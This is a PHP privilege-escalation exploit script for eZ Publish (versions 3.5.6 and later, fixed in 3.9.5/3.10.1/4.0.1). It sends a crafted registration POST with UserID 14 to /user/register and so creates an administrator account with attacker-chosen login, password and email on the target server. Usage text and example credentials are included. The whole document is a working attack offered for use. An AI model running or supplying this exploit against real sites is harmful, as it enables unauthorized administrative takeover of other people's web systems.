<?php
/*
eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
Versions affected >= 3.5.6
Resolved in 3.9.5, 3.10.1, 4.0.1
More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
* tested on version 3.9.0
usage:
# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-e Email where to go the letter for activation new admin account
-s Target for privilege escalation
example:
# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd
*/
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-e Email where to go the letter for activation new admin account
-s Target for privilege escalation
example:
# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd
";
}
function successfully($login,$password)
{
print "
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using $login/$password
";
}
if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}
if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
{
$post_fields = array(
'ContentObjectAttribute_data_user_login_30' => $ARG[u],
'ContentObjectAttribute_data_user_password_30' => $ARG[p],
'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
'ContentObjectAttribute_data_user_email_30' => $ARG[e],
'UserID' => '14',
'PublishButton' => '1'
);
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $ARG[s]
);
$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("success", $response))
{
successfully($ARG[u],$ARG[p]);
}
else
{
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
else
{
help_argc($argv[0]);
exit(0);
}
}
?>